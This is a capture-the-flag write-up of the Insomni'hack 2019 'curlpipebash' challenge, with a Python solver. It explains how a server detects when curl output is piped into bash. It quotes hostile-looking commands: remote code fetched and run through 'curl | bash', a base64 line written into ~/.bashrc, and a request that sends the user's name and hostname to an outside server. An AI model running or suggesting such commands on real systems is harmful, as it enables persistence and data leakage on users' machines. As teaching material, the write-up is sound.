# curlpipebash

>Welcome to Insomni'hack teaser 2019!
>
>Execute this Bash command to print the flag :)
>
>`curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash`

Sending a `GET` request to `https://curlpipebash.teaser.insomnihack.ch/print-flag.sh` returns:
```
$ curl -Ni https://curlpipebash.teaser.insomnihack.ch/print-flag.sh
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Sun, 20 Jan 2019 20:47:15 GMT
Connection: keep-alive
Transfer-Encoding: chunked

curl -Ns https://curlpipebash.teaser.insomnihack.ch/d6add355-1a83-4297-b42e-e756a4177417 | bash
```
Note the `Transfer-Encoding: chunked` HTTP header. It means that the server may dynamically send further data. This technique can be used to determine if the curl output is being redirected to shell or not. The response to the first request is `curl http://example.com/<UUID> | bash`. If the request was piped through shell, another `GET` request (to `http://example.com/<UUID>`) is sent immediately (shell does this) and the actual payload is returned. If the request to `http://example.com/<UUID>` is not sent within some time (e.g. 1 second), the connection is closed.
This is how this challenge works. When you send the request to `print-flag.sh` and nothing more, the connection is kept for ~1 second and closed. If you pipe it through bash, the following happens (note `bash -v`):
```
$ curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash -v
curl -Ns https://curlpipebash.teaser.insomnihack.ch/0132e56e-899f-4bde-a51e-bd87293c49db | bash
base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
curl -Ns https://curlpipebash.teaser.insomnihack.ch/0132e56e-899f-4bde-a51e-bd87293c49db/add-to-wall-of-shame/$(whoami)%40$(hostname)
echo "Welcome to the wall of shame!"
Welcome to the wall of shame!
```
First, `export PROMPT_COMMAND='echo THANK YOU FOR PLAYING INSOMNIHACK TEASER 2019'` is added to your `.bashrc` file. Then you are added to the wall of shame (`curl -Ns https://curlpipebash.teaser.insomnihack.ch/0132e56e-899f-4bde-a51e-bd87293c49db/add-to-wall-of-shame/$(whoami)%40$(hostname)`). To solve this challenge, we need to act like the command was piped through shell, but don't add ourselves to the wall of shame. It means that we need to send a `GET` request to `https://curlpipebash.teaser.insomnihack.ch/print-flag.sh` followed by `GET` request to the returned random URL. The second request must be sent before the initial connection is closed, so we must do this asynchronously. The following python code solves this challenge:
```python
#!/usr/bin/python

import requests
 
r = requests.get('https://curlpipebash.teaser.insomnihack.ch/print-flag.sh', stream=True)
 
for line in r.iter_lines():
    print('1: ' + line)
    if line.startswith('curl') and 'add-to-wall-of-shame' not in line:
        url = line.split(' ')[2]
        print('2: Sending GET request: ' + url)
        r2 = requests.get(url, headers={'User-Agent': 'curl/7.59.0'})
        print('2: ' + str(r2.text))
```
```
$ ./curlpipebash.py 
1: curl -Ns https://curlpipebash.teaser.insomnihack.ch/dcc046ef-f5d6-4466-ba0c-aa088d83d36c | bash
2: Sending GET request: https://curlpipebash.teaser.insomnihack.ch/dcc046ef-f5d6-4466-ba0c-aa088d83d36c
2: 
1: base64  -d >> ~/.bashrc <<< ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK
1: curl -Ns https://curlpipebash.teaser.insomnihack.ch/dcc046ef-f5d6-4466-ba0c-aa088d83d36c/add-to-wall-of-shame/$(whoami)%40$(hostname)
1: INS{Miss me with that fishy pipe}
[grzegol@ insomnihack]$
```
The flag is `INS{Miss me with that fishy pipe}`.